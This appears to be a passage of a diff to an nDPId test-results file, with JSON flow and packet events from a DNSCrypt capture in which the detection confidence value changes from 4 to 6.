00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":37035,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":946739317403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739317403,"pkt":"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"} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":37035,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":37035,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":47257,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":946739317403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAAXcmsIgAL0RopIKAAABM56mYbiZAbsGBBC9B18BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAEAAAAAAAAAAAAFvwAMBbsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":280,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":47257,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":280,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":47257,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":281,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739317403} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":281,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAABQmsIAub0Rx2UKAAABM56mYQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":46066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":946739317403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAAXcmsMgAL0RopEKAAABM56mYbPyAbsGBBVmB10BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAEAAAAAAAAAAAAFvwAMBbsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":46066,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":46066,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":283,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739317403} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":283,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAABQmsMAub0Rx2QKAAABM56mYQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":56494,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":946739317403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAAIcmsRAAL0RhlAKAAABM56mYdyuAbsCCJzVB2ABAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAEAAAAAAAAAAAABwwAMAb8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":56494,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":56494,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":60334,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":946739317403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAAIcmsZAAL0Rhk4KAAABM56mYeuuAbsCCJzVB14BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAEAAAAAAAAAAAABwwAMAb8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":60334,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":60334,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":286,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":48065,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":946739317403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAAXcmsUgAL0Roo8KAAABM56mYbvBAbsGBA2TB2EBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAEAAAAAAAAAAAAFvwAMBbsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
